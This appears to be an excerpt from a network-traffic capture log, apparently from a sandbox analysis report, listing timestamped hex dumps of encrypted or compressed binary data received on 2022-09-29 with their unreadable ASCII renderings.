                                                                                                                                                2022-09-29 12:51:45 UTC18873INData Raw: e9 3f 2b ea b5 d7 eb 43 b4 fb f6 31 b2 79 f6 a6 78 b1 44 a5 0e 83 d0 f1 48 44 8d b5 21 6c 6e 47 75 e7 8f 80 84 a8 8d f5 dc eb dc 3c 3a c8 43 fc d4 64 03 0e 4d 7e b8 64 23 2e a5 ec 0c ae 47 46 6d 71 9f 5d c9 cc b3 22 b6 21 f8 c5 90 68 c7 df 89 08 c4 66 27 d0 a8 6f 91 19 e3 31 c9 fb 62 89 08 bc 7c c1 90 03 02 68 ad b1 44 0d 5d 09 84 e2 94 57 a8 a1 02 fb f1 00 a1 da a6 46 bb 06 63 6b d3 ac 2d 38 c3 b4 f4 c9 96 56 ef 19 8d 94 b6 dc 6c 03 a4 95 78 6d fc 40 a0 2e 9c 81 85 b5 c5 a7 aa fb ab 94 7c 51 fe 89 4c 98 ef e6 e9 33 7c f2 23 21 22 36 66 c3 9d 5b c0 74 39 c8 02 51 7f ad a2 63 1a 17 98 ab 34 42 85 1e 49 53 80 c1 48 7b 36 9a 5c db b4 79 13 67 9e 44 97 86 54 b2 c2 57 80 c3 12 41 0a 53 fb 71 7e 4c 0a 31 34 46 27 39 57 89 6a 42 f8 c7 7f 99 88 7c e1 64 db 57 80
                                                                                                                                                Data Ascii: ?+C1yxDHD!lnGu<:CdM~d#.GFmq]"!hf'o1b|hD]WFck-8Vlxm@.|QL3|#!"6f[t9Qc4BISH{6\ygDTWASq~L14F'9WjB|dW
                                                                                                                                                2022-09-29 12:51:45 UTC18889INData Raw: 03 b3 ef 11 b7 20 f3 6e 95 1d e3 28 24 10 7a ef 81 bf 0b 11 27 11 09 d6 43 f8 2e 05 bf bf 2b 04 62 28 29 de 66 c2 c9 79 94 7b cd 41 e1 03 5f 8e 9d fc d3 fd 0c 80 ea 98 13 c2 84 33 d1 79 47 0b f9 71 8c de 97 57 00 48 20 f9 2c 18 9e 68 70 03 c2 e9 7c db eb ab 11 5e 71 b1 5a af 00 58 8f 17 77 c7 61 f6 7a ef 10 8f 38 56 03 58 d8 39 7c 22 03 53 83 29 5d 4d 21 d8 e8 e1 c5 41 e7 96 8c f5 0c 97 89 ec 3c 09 8e 80 db 84 16 1a 04 e9 45 4c 79 6f f7 e3 ba 57 3b 81 e4 cd 14 9b 77 d4 d3 13 80 70 2f 9e 09 75 af 5c 3f 22 66 52 68 87 7c 02 5d 14 ba 88 42 30 46 c4 8f 09 6e 21 bc 21 02 ce ca a6 86 69 66 90 8c ad 18 f7 3e e0 a6 4a e0 18 6c 7b 33 ff 99 3c 4e d1 d4 c4 7e 4e 83 0f 98 e2 3d 04 54 56 b6 0d 80 13 75 74 d6 39 e3 97 da 30 00 39 0e f6 63 94 f9 6b a8 38 89 ca 01 6d d2
                                                                                                                                                Data Ascii: n($z'C.+b()fy{A_3yGqWH ,hp|^qZXwaz8VX9|"S)]M!A<ELyoW;wp/u\?"fRh|]B0Fn!!if>Jl{3<N~N=TVut909ck8m
                                                                                                                                                2022-09-29 12:51:45 UTC18905INData Raw: a4 44 db af c6 07 c2 24 1d b7 4f 24 26 f6 bb 2e 14 92 38 61 f6 5b fb 01 e1 db 7f 79 85 e0 47 9b b0 df 14 03 a3 6a 5b bb 00 4f 28 47 7f d9 8e d8 dc ad b8 c0 70 ee ec d5 2d 9b ac 5e 5f 72 96 06 54 9d 2f c2 9e c1 85 d7 82 20 e3 fd cf ec 44 d8 89 c8 14 cd ef 9d 35 e7 5f 49 20 72 95 c9 4e 73 22 be e4 64 49 61 42 41 94 94 38 4e ec e1 6d 58 e2 5c 51 5a 94 e4 30 4c c7 f8 cc 98 10 71 fe dc aa e7 bd 07 6e 08 47 c2 22 35 e6 20 08 2d 76 89 3f 9d 1a 91 35 eb be ab 2f 52 37 c0 dc aa 36 0e c2 b2 ba 8b 74 fe 6e e4 78 3b 1f f0 7f c5 eb ba bc 76 8e 1f c2 b3 e5 9a 06 59 0a 04 00 f7 9c e3 0f 70 8e 11 40 b1 55 25 0d 2c a7 40 0e 16 d7 8f fe 60 a3 50 ab c4 d0 0a 22 41 35 94 25 f6 64 38 97 e3 73 0d 15 96 d1 ef 89 38 37 27 79 fa 24 84 05 00 ca 26 b9 b5 99 e3 e1 05 73 68 dc fa 99
                                                                                                                                                Data Ascii: D$O$&.8a[yGj[O(Gp-^_rT/ D5_I rNs"dIaBA8NmX\QZ0LqnG"5 -v?5/R76tnx;vYp@U%,@`P"A5%d8s87'y$&sh
                                                                                                                                                2022-09-29 12:51:45 UTC18921INData Raw: cc 48 36 f0 3b 92 37 35 bc b0 03 dc 0c a9 9d 79 76 e2 c8 d4 df fe e5 5c 98 e3 01 ce 6e 2b 29 14 52 c6 f0 f2 e9 76 5b dc 09 85 4d 92 45 9e 42 9c 79 49 d7 a4 8f 1d be 0a 0e f2 f6 5e 6a 2b 7f 57 46 e5 22 0f b6 41 c7 7d 26 22 19 25 d4 40 60 2f 16 79 7b b2 fc 06 7b 85 b8 43 f6 73 1d 07 ad 31 c9 39 10 ea 73 e0 be a0 b4 a4 8c 4f 9c d0 6e df f5 0b 1b de b6 de c6 11 97 2f 7e a3 57 c9 35 e9 0f 29 13 c4 28 f8 89 07 c0 65 08 fe c6 e0 c3 8e e0 5a c4 bf 0c 2c 15 cf 86 a2 32 0f 85 1c 4a 7d b9 da d5 ed 68 9b 80 ee 9a 67 9e 39 00 a1 41 5d bd 5b 26 b0 fe b9 d9 f1 69 86 89 99 a2 d7 67 c4 aa 91 7b 60 99 07 76 40 ea 99 c0 2e de b5 52 cb 9b a8 c1 e9 e0 bb 65 01 34 f8 a6 e8 bf fc 60 2a 92 06 63 35 0b 59 d6 6a 62 b2 ba ef b4 29 b6 d9 71 c0 0a 16 e8 82 83 09 cb 61 28 7f 73 14 e9
                                                                                                                                                Data Ascii: H6;75yv\n+)Rv[MEByI^j+WF"A}&"%@`/y{{Cs19sOn/~W5)(eZ,2J}hg9A][&ig{`v@.Re4`*c5Yjb)qa(s
                                                                                                                                                2022-09-29 12:51:45 UTC18937INData Raw: 97 30 a8 37 bd 7b ac 75 fc 70 9d f5 1b d5 f3 30 2a b3 8d ca 77 cd b3 97 71 9a 23 76 c8 97 77 cb e6 ce f1 30 f5 ce 61 f9 0d b2 d5 15 a0 7d e7 7b 09 b3 29 f9 ee f1 22 0a 97 ca f6 7c f1 0a 64 e3 c3 60 7b 83 41 80 8d 47 f7 9b 0b 74 84 31 a1 5b db db 12 cd b9 e7 f3 af 1b 39 c1 06 9e 0b 96 ca e1 db 27 f7 87 3c bc 9b 84 1a 74 2e 5e 23 fe dd f0 e4 61 8e fe 83 f2 63 51 69 f8 ab 2c fe 6f 5c 8a 04 c0 13 de 8e 63 4a ff 4a 35 88 1b 66 2d 80 6f 0c 75 e1 31 5a 49 6a b8 61 60 4d ef f3 c0 53 af f5 c8 85 14 02 25 d5 14 53 f2 c5 73 86 77 a2 bb ce 17 d6 06 43 75 6c b6 55 68 6b b5 43 28 57 8f c5 c5 f9 20 dc 32 9f b8 f7 68 80 56 51 4b 3c 4b 62 09 d3 5a c7 af 12 84 ec f9 75 04 15 e1 50 2d 90 78 15 e1 8d 21 31 69 8a d1 34 12 78 8b 4c ea 3c fc f5 29 f6 b9 95 31 d4 a8 29 ad d8 f8
                                                                                                                                                Data Ascii: 07{up0*wq#vw0a}{)"|d`{AGt1[9'<t.^#acQi,o\cJJ5f-ou1ZIja`MS%SswCulUhkC(W 2hVQK<KbZuP-x!1i4xL<)1)
                                                                                                                                                2022-09-29 12:51:45 UTC18953INData Raw: 9f f3 89 8e 2a b3 a8 50 30 3d e5 56 43 12 f8 bc ea cb 95 9f 95 44 e9 f4 e8 14 28 96 fb 11 fe ff e1 8d 77 1e f7 7d 52 fa f2 7e 15 b4 06 1f 61 94 36 42 60 ad ef 78 9f ee 10 9b 63 44 1f 0a b1 0b 78 1c f8 4d 48 e6 0d 3d 0a 9a 96 05 9d 46 4a 4c 0a a7 da a4 8f c7 ce 0f 80 b4 85 b0 e9 85 a3 e4 a1 f7 42 09 b8 86 37 0a e1 69 90 fa 1e d8 e2 1c 67 22 da 64 d6 cc b9 55 31 2a 60 29 9a 34 8b 10 1d 95 ad b9 56 a9 75 65 26 1e c3 4d d0 ca 58 01 2e bb 7e dd e3 fd ac ff 64 94 f1 c4 35 6e 37 88 71 8f d5 0f 36 f3 1a 68 f4 3c b6 16 d2 cc 40 ce 45 3c 93 8b 1e 31 e0 61 75 c8 ef c7 e8 25 8d 54 3c 66 76 85 4a 3f de 72 2c b7 88 f0 22 5d a9 80 2a f8 aa 8a 2c df 0d a7 ab 96 9f f1 0b 66 b1 ca 34 07 97 f0 aa 20 36 71 1a b8 1e aa 5a 8d 40 94 e1 8d 91 68 79 75 2d 39 5e 00 2e a3 1b f7 74
                                                                                                                                                Data Ascii: *P0=VCD(w}R~a6B`xcDxMH=FJLB7ig"dU1*`)4Vue&MX.~d5n7q6h<@E<1au%T<fvJ?r,"]*,f4 6qZ@hyu-9^.t
                                                                                                                                                2022-09-29 12:51:45 UTC18969INData Raw: e2 9b d0 b7 61 2b 57 ea 0e 3f 6c 9d bd 4e b7 87 4e 1c 5a 76 fa 8a 1c 14 89 e9 b8 7a 19 3e 28 f3 69 35 9b 5b 29 f4 5c 66 5e 3e 1f d8 df d5 13 c8 1e 08 58 0d 9f 46 d7 31 3f cb 21 90 dd b1 ec f0 51 90 8e d2 6f fd 64 20 39 11 d3 82 2d 5c 27 a9 80 b7 e1 87 21 3e 05 c1 0b 95 ef d2 b1 81 a0 16 28 03 72 b0 a0 7c fe 09 7c a5 62 9c 99 dc c6 b3 18 bf f2 26 c4 bd 3a 14 e0 0d 80 d0 2c 18 22 6e 34 90 e2 a7 7c b2 f6 e8 25 51 8b 9a 5b fe 0d 30 89 31 70 42 cf fb 3f a7 8c d3 20 90 f4 a9 bb ea 6c f7 77 c4 f3 2d d4 55 6d ad 5c 01 b2 59 44 b4 ef e9 1d 25 f5 c9 60 57 13 5b 8b 08 a4 9e e3 73 9e b6 ce 92 9a aa 41 77 88 2f 95 4f 4d 32 8e 19 31 dc a5 1f 87 c2 cf 2b d6 52 f0 2a 20 73 b1 f4 e0 3f 0e e3 92 71 d9 e1 b3 8e dc 3d ad 31 30 b6 4e c4 25 59 fa bd 53 c5 a1 5c 14 c6 88 33 c0
                                                                                                                                                Data Ascii: a+W?lNNZvz>(i5[)\f^>XF1?!Qod 9-\'!>(r||b&:,"n4|%Q[01pB? lw-Um\YD%`W[sAw/OM21+R* s?q=10N%YS\3
                                                                                                                                                2022-09-29 12:51:45 UTC18985INData Raw: 42 07 13 f5 7e ae 51 5b 20 b6 c0 30 b0 70 ac fb 8a 06 95 a2 b7 86 15 44 c9 1f b7 cf 09 df b3 76 23 f9 3a a1 06 fd 10 97 ae c5 ed 2b 95 7d 5f 1c 74 7f 9d 28 0d 02 dc db aa 4b bb 5e 34 b0 ae 38 6f e6 61 dc 37 d1 4f 6b d4 45 19 b1 6a 59 1d 89 1f 5a ef 07 50 22 3e 2f 4e 34 28 08 21 ff 8a 04 ea d8 de d6 11 ce d2 d8 5e 27 71 46 3f 76 e1 6b ab e9 8d a2 4a 5e de 55 10 aa 34 40 f6 5c 01 f1 fe 8c a3 74 a0 a6 4c 94 1f 8e 56 39 29 e9 65 cb 33 4f 91 55 af 3e 4c 2e 91 8c 29 ce 65 ec 0b 8b 2c 66 cc 8f 3f 54 82 9b 9c e3 92 6f 74 f6 21 0e c5 88 e9 e7 31 be 8b e1 d4 29 8b 50 58 6e 9a ef d4 b3 16 14 b9 ce e1 fe 30 e8 72 4a ea 3d da 0d 50 82 d1 6a 9c b4 f4 74 aa a5 52 57 86 8a 80 92 f1 20 7a 16 49 a8 82 ed 4d 35 4d 60 36 30 bc 4d f6 29 ad b9 7b 87 a2 06 57 4f 07 36 13 81 64
                                                                                                                                                Data Ascii: B~Q[ 0pDv#:+}_t(K^48oa7OkEjYZP">/N4(!^'qF?vkJ^U4@\tLV9)e3OU>L.)e,f?Tot!1)PXn0rJ=PjtRW zIM5M`60M){WO6d
                                                                                                                                                2022-09-29 12:51:45 UTC19001INData Raw: 4f 14 65 50 77 40 0b 49 69 14 36 56 c1 72 21 a6 5e e2 92 3c ae e5 28 42 8d e9 48 66 fc a2 34 3f 3c fc e9 f8 15 89 c8 07 83 ed a5 f3 5d 8b 32 87 60 4a bc 60 53 ae 56 ab 78 9d b1 d3 54 f3 04 62 51 28 a2 34 fd ad 04 d9 4d 9e 0d 2d ac c2 bb 16 4b 43 ea 38 3a 60 12 e5 0a 8a 53 fe d9 b2 2d f2 a7 3d 82 ab b3 b9 9e cd 8a f8 c9 39 f5 65 2f 9d 4c cb 3b d0 09 db 83 2b 40 1e c6 da 63 6a 84 96 69 0a e5 ba 7e b8 61 2e 43 19 52 13 60 57 a3 be 56 bf 4c 8c 78 3b c9 af 2d 85 d9 38 56 ee 30 c7 be 3f 2e 36 a6 10 9b cb 8c f2 01 86 cb 0f c1 18 df 00 fb 1e 3f 56 d8 e1 16 52 f1 a4 2e df dc 67 b9 5b 3d 57 c2 7e ab a1 75 a5 24 c5 1e 59 c2 5c 30 81 be 4d a6 62 0a ca d5 95 cd 72 1d b7 28 82 60 dc 43 fc 44 f5 1f 06 8e 28 1a b0 a3 a5 3d a1 d1 2c 7c 7c 74 69 41 ad 35 f9 c5 da 1c ad 65
                                                                                                                                                Data Ascii: OePw@Ii6Vr!^<(BHf4?<]2`J`SVxTbQ(4M-KC8:`S-=9e/L;+@cji~a.CR`WVLx;-8V0?.6?VR.g[=W~u$Y\0Mbr(`CD(=,||tiA5e
                                                                                                                                                2022-09-29 12:51:45 UTC19017INData Raw: c9 26 36 cf 74 5a c0 55 67 6a 88 f4 c4 20 6c d0 bf 37 fd 66 9a c1 04 80 fa 3a 5c 5b 17 b1 5b 04 fa 15 63 e9 bf 87 60 d1 6b 9b 7a ef 65 78 33 49 57 64 5a ae 15 9a 5d 4f c7 37 d3 58 8f 66 5d 89 18 d2 ee dc e1 37 b5 e8 5f 35 63 81 40 f9 92 1b 33 f7 3b 9f be 4b f3 aa 35 3f b1 a4 e9 44 dc ff 49 dd 94 49 22 ed 7f 5e 05 a2 0d ab 30 54 56 8f 37 32 1f 2c 9a ea 27 30 e4 71 e0 b5 20 fe f1 37 86 c1 71 73 4d 8b 74 23 30 f3 06 ac 72 5e f1 47 18 45 fd 64 e4 31 34 54 5c 57 8c 74 23 e3 e2 65 39 b2 78 b1 3e a3 23 08 07 ef ac 82 84 78 9e d6 4b 3c 02 e9 6d 48 86 4c fe 1a 45 4b c4 84 c3 94 2b b4 3f fd 06 da f5 08 92 47 90 09 63 5b e3 5b 27 da 51 90 00 4b df c6 09 44 d0 5c 5a c2 0d 84 36 7f cc c2 8a b0 5c d7 e0 e7 56 a2 91 29 dd 69 24 ee ae 6e f7 1b 65 e6 7d 5d 50 ce 41 74 ae
                                                                                                                                                Data Ascii: &6tZUgj l7f:\[[c`kzex3IWdZ]O7Xf]7_5c@3;K5?DII"^0TV72,'0q 7qsMt#0r^GEd14T\Wt#e9x>#xK<mHLEK+?Gc[['QKD\Z6\V)i$ne}]PAt
                                                                                                                                                2022-09-29 12:51:45 UTC19033INData Raw: 19 24 c4 1a c8 bb fa 66 32 a9 89 3f 09 f5 d4 b9 29 85 f1 15 e7 aa 0c e8 28 8b 6e 76 03 36 a2 d6 6d 24 fc b8 3c 52 01 a0 1a cc 13 44 09 e1 96 ce 85 7d af c3 6e e7 7a bd 30 91 1b ba 0f 54 ea 31 ae 0a 04 0a 31 59 6e 5a 05 e2 8a c9 42 e7 8a 96 65 e8 91 79 a7 b2 4d a4 12 6c 0e 93 6f 29 f1 09 82 02 8f 24 7d 89 44 dd df 7b 6a 9b 00 30 cb 2b ee 0d 57 5e f7 bc 9b d8 9f 74 ed 54 60 9c 7e 07 4a 17 be 77 ca 49 ac 61 bc 24 3d b3 5a b6 18 46 eb 44 12 d2 45 f8 c8 e0 fd a4 67 86 f2 7c eb 98 a5 c1 79 69 f8 51 fb 80 f2 06 c6 af 9e 74 27 be 71 94 15 7d ab 66 66 26 06 e6 97 3e 8f 12 18 88 68 90 33 0c e6 48 fd 51 eb ca e4 d7 e7 5c a4 c4 5f e0 a4 ac 67 17 c7 47 d9 c5 2d 8f 26 68 f6 47 9f 31 18 d3 bf 69 3e 3c 9f ea dd f2 dd 77 f0 19 db 9c d7 4c d3 4d d3 3c 0e 73 ab 3c 46 8b 89
                                                                                                                                                Data Ascii: $f2?)(nv6m$<RD}nz0T11YnZBeyMlo)$}D{j0+W^tT`~JwIa$=ZFDEg|yiQt'q}ff&>h3HQ\_gG-&hG1i><wLM<s<F
                                                                                                                                                2022-09-29 12:51:45 UTC19049INData Raw: 10 04 ea 22 5d 7f 71 38 7c 12 6b c6 e2 10 74 04 0d 36 a4 f1 f1 8b c3 dd e9 ca 78 b9 74 30 ac 39 88 83 14 21 da 29 52 ff 74 97 71 f6 4d c0 1e 44 53 6e d1 65 59 f5 9d 26 84 ce e2 01 7b 98 af 81 9b af b4 86 2e dd 5e dc d2 c0 27 f1 c7 80 9f bb b7 e8 32 02 a7 71 12 34 f7 4f ec 07 3c 72 2e 56 7f 68 23 5c c1 1a 60 24 58 06 f1 61 40 99 54 57 fd ed 0e aa 8e f7 72 dd 60 6d 14 27 b4 52 8a d4 fb 31 8e 37 b7 a8 a3 17 3e 12 b8 09 31 d2 b7 a7 b0 bf 78 3d 9f 00 40 22 75 57 3f a1 b5 c5 51 eb 1b ad 97 3c fa 74 e1 e2 89 43 7f 88 06 fa 60 e6 0b 38 30 58 20 c3 13 b0 3c 80 dd c7 71 be 38 92 71 1f ce d8 ac a5 a0 72 52 16 88 b8 0b 1f b4 ea c8 b8 b4 cc c8 20 c3 fb 23 4e a1 48 46 b0 18 b9 2b d0 91 cd 5e b7 a1 d5 ee a7 53 80 92 22 c5 79 fa e0 23 40 21 c7 09 7e bb 21 4e 22 68 c4 d5
                                                                                                                                                Data Ascii: "]q8|kt6xt09!)RtqMDSneY&{.^'2q4O<r.Vh#\`$Xa@TWr`m'R17>1x=@"uW?Q<tC`80X <q8qrR #NHF+^S"y#@!~!N"h
                                                                                                                                                2022-09-29 12:51:45 UTC19065INData Raw: 98 40 99 bd 9c 86 1b c1 d4 a2 63 86 cc 68 21 57 c3 aa 1e 67 5a c3 62 44 a9 c4 8b e5 4b db 29 3c d9 d4 1c 52 4c a1 e3 83 31 fb ed 7b 11 04 89 8a 1c 9f f2 3e 43 c9 70 f7 a7 63 e5 d7 8c 68 27 3b f2 d6 65 50 2b c1 ea e1 80 49 1a a9 e9 2b 42 cf 1e be a6 82 66 00 63 35 ea eb 19 d3 dd 58 aa 83 ca 73 78 c8 8b f0 11 f5 18 71 3c 44 2c f7 27 f1 00 80 c0 8f 6e a5 82 45 d5 e6 aa 84 01 6c 88 32 3d d8 2e 67 ae 75 64 41 0e d4 f4 af 3c f5 8f 54 56 46 97 44 9a ff 23 9d 47 66 06 d5 26 df 94 6a d8 57 4d f5 50 c7 e7 61 4d f5 28 a3 17 4a 78 1b e1 8d e1 50 63 0d d7 6b ab a1 02 e1 e0 61 10 26 4d 0d ad 71 30 c0 35 31 49 0d 0f 37 02 ce fa bf fc 45 56 fc 82 a7 ec 43 cf 3c a4 64 9a 60 50 2c a0 65 73 22 6c d0 a9 f2 71 f7 df a0 4a a5 2c 44 75 bf a7 16 50 49 e9 cb cf 23 ea 5f 05 5d e4
                                                                                                                                                Data Ascii: @ch!WgZbDK)<RL1{>Cpch';eP+I+Bfc5Xsxq<D,'nEl2=.gudA<TVFD#Gf&jWMPaM(JxPcka&Mq051I7EVC<d`P,es"lqJ,DuPI#_]
                                                                                                                                                2022-09-29 12:51:45 UTC19081INData Raw: 16 4b 3c da df e2 4c b3 8b 50 74 39 62 b2 c3 be 47 6c f8 2a 1c 87 66 ad ab 33 8a 54 2f fa 9c bc 08 d4 05 c3 6a 79 2d fe 93 b5 82 fc a5 ff a7 e1 8c e1 e3 91 7a 33 d1 c4 dc ad e1 f6 3f a6 69 df 95 68 25 89 ef da 4d 14 44 19 72 7d 34 91 fd e0 52 74 de b7 09 3b 46 bb fc f6 85 cf fc 71 62 62 22 f6 2a 1f f1 d7 0e 8d b6 eb 95 0c 95 a0 18 46 eb 5c 9b e3 a0 a4 2d 7b 0f c2 a8 87 8a f0 3f bc 69 ee 7a 1b 85 c2 e0 1c dc 1f 11 ea d1 84 ad 48 3a fa 36 90 d7 50 95 ae dc c0 cd fc 30 7b 7b d7 53 e2 99 73 3f e3 43 c1 78 db 1e 3d f1 92 38 2a ee f1 51 4a 53 2a 8b d5 12 4e bd 57 70 24 96 af 93 be a5 ab 52 9d bd 94 19 be 49 8f 90 22 4e 3a 1e 81 68 4a e2 62 ff 85 c5 5b 0e 33 50 2e 7a ec 16 7b e1 40 73 6a be 50 7e c8 62 ac 23 75 6c 6c eb bd 17 81 6a 3a 26 a9 4f be e7 b2 56 08 8f
                                                                                                                                                Data Ascii: K<LPt9bGl*f3T/jy-z3?ih%MDr}4Rt;Fqbb"*F\-{?izH:6P0{{Ss?Cx=8*QJS*NWp$RI"N:hJb[3P.z{@sjP~b#ullj:&OV
                                                                                                                                                2022-09-29 12:51:45 UTC19097INData Raw: f6 70 54 22 b3 a2 f3 b1 92 29 e9 0f 3a ef 98 32 72 7a e9 db 12 59 1f 1c fd 70 19 ad 59 9c 6d d7 cb 4f ad e6 9a f2 59 96 96 2e c7 f6 81 8b 9c 1e 19 ee 85 6d ed ab 84 cc da 9b b1 7a 09 a1 d3 50 99 55 ca 2b 3b 80 88 69 da 6c 70 9a 58 55 1d 3f 0e e4 4e ce e7 6d 0d 0a 6e 54 cc e3 6e c9 1e fc 15 43 c9 bb e4 40 35 6c 84 de a4 1c 4f 76 c9 87 9a 2e fe c8 bf 0b 2b 82 0b c4 2b 26 d1 ac 12 d1 0d 7c 9a 00 f4 d8 d6 86 6d cd d2 c5 d4 b7 7b 22 c0 53 75 69 dc 30 5e ac a5 c3 e6 66 11 7e bb 6f 8e 6e 09 08 e9 76 89 63 79 fc 9a 26 00 05 44 ce 23 2c fb e7 00 b5 87 60 f3 f2 d8 06 0d 67 51 e7 c7 16 ba 46 ec 99 57 5b cf 77 51 4a 52 f5 61 23 db e9 c6 78 a2 e8 1e c9 bd 51 13 c2 13 54 8d 79 a5 6b b0 64 a5 66 0d 7d 1b 73 e4 7c 7d c5 4d 0b ae 9e e7 f7 df cd 91 ee 40 0e 43 e7 4b f4 bd
                                                                                                                                                Data Ascii: pT"):2rzYpYmOY.mzPU+;ilpXU?NmnTnC@5lOv.++&|m{"Sui0^f~onvcy&D#,`gQFW[wQJRa#xQTykdf}s|}M@CK
                                                                                                                                                2022-09-29 12:51:45 UTC19113INData Raw: 4f 57 25 a1 fc 98 90 de 34 79 54 9d 88 d3 45 ee 02 d7 eb 58 34 70 8a 28 49 e7 0c b9 4c 6d fb 41 9f 04 3c 86 6e 22 7b 94 88 a5 da 07 9e 0e ed cd 7b ef 45 ff e0 c5 e4 54 09 a6 0f 5a 7c 4d 54 66 8a 39 f5 84 52 b2 e3 84 e0 06 d6 77 28 3d db 1d 95 90 0b 61 1d 35 db 64 68 75 35 49 a9 86 80 08 d0 a6 b4 49 43 97 2d 3a 41 73 66 ec 78 aa 54 0b b4 f7 d0 df 37 50 18 dd b6 56 c7 16 f9 8e 3f ab 16 8b e0 4f 69 f6 3b f4 68 97 3c 10 06 c6 5b ee 99 ad ba 46 6a fe 29 ab 28 c4 c1 69 3c 3e 02 93 61 03 69 b0 16 e7 c1 ea a9 58 e1 34 d2 d7 a9 e7 6f 35 3b 9d d2 08 a3 c1 0b bc af 41 02 cc 9c bf d8 d4 89 22 07 ec ea 42 37 2f e0 37 f5 5f b9 20 6c e7 90 0b 14 05 35 2e 0d 4a 23 89 12 95 02 45 cf aa 0e 1e 95 81 94 a5 c4 7b f7 d3 10 c8 59 1e 06 d6 38 c4 2e 0a 05 6c 97 42 44 53 89 cc 03
                                                                                                                                                Data Ascii: OW%4yTEX4p(ILmA<n"{{ETZ|MTf9Rw(=a5dhu5IIC-:AsfxT7PV?Oi;h<[Fj)(i<>aiX4o5;A"B7/7_ l5.J#E{Y8.lBDS
                                                                                                                                                2022-09-29 12:51:45 UTC19129INData Raw: fd 00 74 33 74 93 b4 fe 30 83 a8 cc 59 c0 ec 03 46 85 f0 c9 58 20 a2 1c f8 9d 8e 05 77 d9 ae 08 21 4e a2 e1 6f 0b 6e 8d b9 a5 b5 f0 3e 15 4e af 36 dd f2 93 82 d6 4f fe dc 93 6a aa a7 36 b2 1b 8b ee e6 6e 9a 2e 81 e2 51 f1 6d b1 4f 25 8e ba 4f 73 57 24 ab f5 6e 19 fd 11 58 c7 70 8a 29 67 9f 98 81 7b 17 a0 3e d8 52 c5 ac 64 03 b7 35 e9 60 51 c1 64 a0 a0 13 81 60 6d e3 54 6b 77 5a ba ca 49 8c d5 c2 03 9f 96 cb d4 b7 fa 00 8e 5d 4f 63 c4 59 75 19 93 aa 04 92 4f 56 56 d8 60 6a 65 f8 70 13 0c 98 57 78 42 d8 2e 1e fc d4 bd 37 05 f7 93 5b c9 c8 76 45 22 ef 95 b0 80 07 8e 37 7a 65 6d e5 2f 33 92 39 14 46 1d 5b d3 ff 47 fe cf 81 fb e0 96 b1 1c ef 9e c7 8a 47 4e b2 aa 4f 4e 75 83 56 26 4b 82 de 07 18 24 22 d1 64 65 7c db 49 01 6c 46 25 f8 cb 47 93 67 f4 7f d2 03 a8
                                                                                                                                                Data Ascii: t3t0YFX w!Non>N6Oj6n.QmO%OsW$nXp)g{>Rd5`Qd`mTkwZI]OcYuOVV`jepWxB.7[vE"7zem/39F[GGNONuV&K$"de|IlF%Gg
                                                                                                                                                2022-09-29 12:51:45 UTC19145INData Raw: eb 74 96 bb 85 51 8f e7 53 b1 be e0 3b 89 f1 a0 02 15 64 67 bd e9 c3 3a d8 33 11 df 7c 81 5a c9 d0 ed 1c 2d e8 86 0e ab 27 88 59 08 dd 6b 4b e1 86 43 f5 1f 5c 23 6e d8 16 66 26 36 92 b6 c8 c5 09 09 72 71 e3 cc ae 53 9b a2 ba c9 77 93 9c c6 e7 bd 4a 02 fa 68 c3 41 5c ed 3f 19 d0 92 1a 81 27 c9 8d 5b 9d f9 27 8d 61 7b ad 1b 22 39 aa b7 06 3c ff 0c 5a a3 0e 3a ca ae d3 06 fb 78 52 79 f5 61 6b 9b f9 40 38 dd 2c b0 57 01 3a 86 96 b9 54 24 7d 51 6f f4 51 04 c2 d0 e1 96 d9 aa 00 ae 2b ff 15 f6 0f df a7 28 0e f2 2e 7a 93 5d 32 56 e9 da c6 cd d5 c6 2a 5e 9d dc b0 ce df 8a 49 9a 1b 56 c5 c3 3c 1d 3b a4 98 87 dd d9 e5 22 7f 72 fd 4b 69 54 e7 0c 5c 16 9f ba f8 bc 45 d9 64 6b 5a 70 3b 8b 8c 12 ec fe e0 19 ae 35 8e 9a bc 37 41 03 22 cf da ea 6b 0d 8d 38 a4 55 c9 6c 3c
                                                                                                                                                Data Ascii: tQS;dg:3|Z-'YkKC\#nf&6rqSwJhA\?'['a{"9<Z:xRyak@8,W:T$}QoQ+(.z]2V*^IV<;"rKiT\EdkZp;57A"k8Ul<
                                                                                                                                                2022-09-29 12:51:45 UTC19161INData Raw: 19 86 34 b3 59 80 03 d3 e2 af bb ba 13 31 74 1c 6d 5a 1b 1d 93 f6 a1 5f b5 fd 35 9e be 7c 3c 10 21 28 90 5c c6 c9 57 3b 6e 68 9d 9f 45 85 66 1a 5b 94 01 a4 c1 f8 c3 fb f7 9c 89 43 35 38 b1 d1 99 7b 1c 34 43 1c 78 61 f4 85 62 74 c4 1d b4 0a f6 b5 f9 21 cf de 4c 58 84 b2 80 e5 47 09 c7 82 c7 bd 53 29 ad 05 b2 1a 04 2f f4 c7 51 68 23 f0 54 b1 00 95 85 e3 dd 92 2a 30 de 53 50 9f 82 c3 00 9d d2 c5 a4 f7 33 16 94 ac 2f a0 8d 38 2f 74 bb 6a e0 73 0e 51 ac b4 13 4f 3b 35 6c f3 72 aa 33 a0 32 84 68 3b af d6 01 bc 22 a6 da b5 07 b4 e2 ec 70 f1 f3 6d b3 b8 29 64 08 75 e5 0b a3 7a 9a cf ac 61 70 e9 76 0c b2 6e f4 e4 48 3d d9 c0 b1 fd 91 d3 76 71 e2 6e 9c a7 5c 38 d1 ff 82 10 54 90 48 db 26 70 a2 c8 0e 97 2f e9 5f 9b 49 e3 11 6f 58 b6 ed 9d ab 53 af a5 65 94 10 66 fb
                                                                                                                                                Data Ascii: 4Y1tmZ_5|<!(\W;nhEf[C58{4Cxabt!LXGS)/Qh#T*0SP3/8/tjsQO;5lr32h;"pm)duzapvnH=vqn\8TH&p/_IoXSef
